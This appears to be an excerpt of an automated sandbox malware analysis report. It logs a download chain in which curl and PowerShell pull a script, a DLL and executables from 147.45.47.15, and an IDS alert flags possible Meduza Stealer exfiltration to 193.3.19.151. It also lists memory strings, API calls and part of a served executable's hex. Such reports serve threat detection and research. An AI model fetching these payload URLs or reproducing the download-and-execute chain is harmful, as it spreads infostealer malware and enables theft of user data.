00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 2c 1d 00 00 00 40 02 00 00 1e 00 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 96 00 00 00 60 02 00 00 98 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 2a 00 00 00 00 03 00 00 2c 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:11:49 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 09 Dec 2024 20:28:42 GMTETag: "13ba00-628dc35e76e87"Accept-Ranges: bytesContent-Length: 1292800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 14 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 df 12 00 40 01 00 00 00 f0 13 00 e0 01 00 00 00 80 13 00 18 6c 00 00 00 00 00 00 00 00 00 00 00 00 14 00 3c 0d 00 00 d0 83 11 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 85 11 00 28 00 00 00 90 82 11 00 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 32 0d 00 00 10 00 00 00 34 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 a8 05 00 00 50 0d 00 00 aa 05 00 00 38 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 7c 00 00 00 00 13 00 00 5a 00 00 00 e2 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 6c 00 00 00 80 13 00 00 6e 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 13 00 00 02 00 00 00 aa 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 0d 00 00 00 00 14 00 00 0e 00 00 00 ac 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 193.3.19.151 193.3.19.151
            Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
            Source: Joe Sandbox ViewASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.4:49740 -> 193.3.19.151:15666
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 147.45.47.15:80
            Source: global trafficHTTP traffic detected: GET /iviewers.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Launcher.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15
            Source: global trafficHTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD5240 InternetOpenA,InternetOpenUrlA,HttpQueryInfoW,HttpQueryInfoW,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,12_2_00007FF6F1DD5240
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /script.ps1 HTTP/1.1Host: 147.45.47.15User-Agent: curl/7.83.1Accept: */*
            Source: global trafficHTTP traffic detected: GET /iviewers.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Launcher.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15
            Source: global trafficHTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1773560054.00000000047D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1773560054.0000000004950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15/Launcher.exe
            Source: Launcher.exe, 00000006.00000003.1871867070.00000000035C7000.00000004.00000020.00020000.00000000.sdmp, iviewers.dll.5.drString found in binary or memory: http://147.45.47.15/duschno.exe
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1773560054.00000000047D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15/iviewers.dll
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15/iviewers.dllXR
            Source: curl.exe, 00000004.00000002.1738520140.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, script.htaString found in binary or memory: http://147.45.47.15/script.ps1
            Source: curl.exe, 00000004.00000002.1738755036.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15/script.ps11gU
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15D
            Source: powershell.exe, 00000005.00000002.1773560054.00000000047D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.4zY
            Source: powershell.exe, 00000005.00000002.1781715663.0000000006C81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mD
            Source: powershell.exe, 00000007.00000002.1812229700.0000000007FA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: io12j1es.2tm.exe, 0000000C.00000003.2108934415.000001F159CD0000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1894770651.000001F159CC1000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.2109042169.000001F159CD4000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.2108962470.000001F159CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.t/Regi
            Source: powershell.exe, 00000005.00000002.1779711117.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1797529173.0000000004611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1797529173.0000000004611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
            Source: io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A016000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1897946678.000001F15A015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A016000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1897946678.000001F15A015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A016000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1897946678.000001F15A015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000005.00000002.1773560054.0000000004D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: io12j1es.2tm.exe, 0000000C.00000003.1927283382.000001F157584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: powershell.exe, 00000005.00000002.1779711117.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1805117636.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906772053.000001F159B22000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A114000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1922082521.000001F15A030000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F159268000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F159260000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A11C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
            Source: io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A0A9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A07F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A00E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A01F000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A038000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1900063983.000001F159FA9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899926649.000001F157550000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A084000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A0A9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A07F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A00E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A01F000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A038000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1900063983.000001F159FA9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899926649.000001F157550000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A084000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: io12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906772053.000001F159B22000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A114000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1922082521.000001F15A030000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F159268000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F159260000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A11C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: io12j1es.2tm.exe, 0000000C.00000003.1911472815.000001F15A638000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A123000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: io12j1es.2tm.exe, 0000000C.00000003.1911472815.000001F15A638000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A123000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B690DA OpenClipboard,6_2_00B690DA
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B63450 GlobalAlloc,GlobalLock,StringFromGUID2,wsprintfW,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00B63450
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B62EF0 GlobalAlloc,GlobalLock,StringFromGUID2,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00B62EF0
